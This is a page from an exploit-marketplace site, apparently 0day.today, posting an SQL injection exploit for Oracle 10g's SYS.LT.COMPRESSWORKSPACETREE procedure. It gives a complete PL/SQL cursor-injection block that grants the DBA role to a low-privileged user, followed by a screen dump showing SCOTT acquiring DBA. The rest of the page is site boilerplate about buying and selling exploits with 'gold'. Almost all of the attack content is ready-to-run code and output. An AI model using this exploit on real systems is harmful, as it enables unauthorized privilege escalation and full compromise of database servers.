0day.today - Biggest Exploit Database in the World.

Select your language:

Things you should know about 0day.today:

We use one main domain: http://0day.today
Most of the materials is completely FREE
If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD

We accept currencies: [contact admin to find more]

We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!

We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!

I am registered user of 0day.today. I don't want to see this screen in future.

What to do first?

Read the [ agreement ]
Read the [ Submit ] rules
Visit the [ faq ] page
[ Register ] profile
Get [ GOLD ]
If you want to [ sell ]
If you want to [ buy ]
If you lost [ Account ]
Any questions [ admin@0day.today ]

Main links

You can contact us by

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

[ authorization ] [ registration ] [ restore account ]

You can contact us by:

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

Oracle 10g SYS.LT.COMPRESSWORKSPACETREE SQL Injection Exploit

Author

Sumit Siddharth

Risk

[

Security Risk Unsored

]

0day-ID

Category

Date add

Platform

=============================================================
Oracle 10g SYS.LT.COMPRESSWORKSPACETREE SQL Injection Exploit
=============================================================


This is based on cursor injection and does not need create function privileges:

DECLARE
D NUMBER;
BEGIN
D := DBMS_SQL.OPEN_CURSOR;
DBMS_SQL.PARSE(D,'declare pragma autonomous_transaction; begin execute immediate ''grant dba to scott'';commit;end;',0);
SYS.LT.CREATEWORKSPACE('a''and dbms_sql.execute('||D||')=1--');
SYS.LT.COMPRESSWORKSPACETREE('a''and dbms_sql.execute('||D||')=1--');
end;

#-----------screen dump---------------------------------------------------#
SQL> select * from user_role_privs;

USERNAME                       GRANTED_ROLE                   ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SCOTT                          CONNECT                        NO  YES NO
SCOTT                          EXECUTE_CATALOG_ROLE           NO  YES NO
SCOTT                          RESOURCE                       NO  YES NO

SQL> DECLARE
  2  D NUMBER;
  3  BEGIN
  4  D := DBMS_SQL.OPEN_CURSOR;
  5  DBMS_SQL.PARSE(D,'declare pragma autonomous_transaction; begin execute imme
diate ''grant dba to scott'';commit;end;',0);
  6  SYS.LT.CREATEWORKSPACE('a''and dbms_sql.execute('||D||')=1--');
  7  SYS.LT.COMPRESSWORKSPACETREE('a''and dbms_sql.execute('||D||')=1--');
  8  end;
  9
 10
 11  /
DECLARE
*
ERROR at line 1:
ORA-01403: no data found
ORA-06512: at "SYS.LT", line 6118
ORA-06512: at "SYS.LT", line 6087
ORA-06512: at line 7


SQL> select * from user_role_privs;

USERNAME                       GRANTED_ROLE                   ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SCOTT                          CONNECT                        NO  YES NO
SCOTT                          DBA                            NO  YES NO
SCOTT                          EXECUTE_CATALOG_ROLE           NO  YES NO
SCOTT                          RESOURCE                       NO  YES NO


Sid
www.notsosecure.com



#  0day.today [2024-11-16]  #

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

Oracle 10g SYS.LT.COMPRESSWORKSPACETREE SQL Injection Exploit

Report Error

Report Error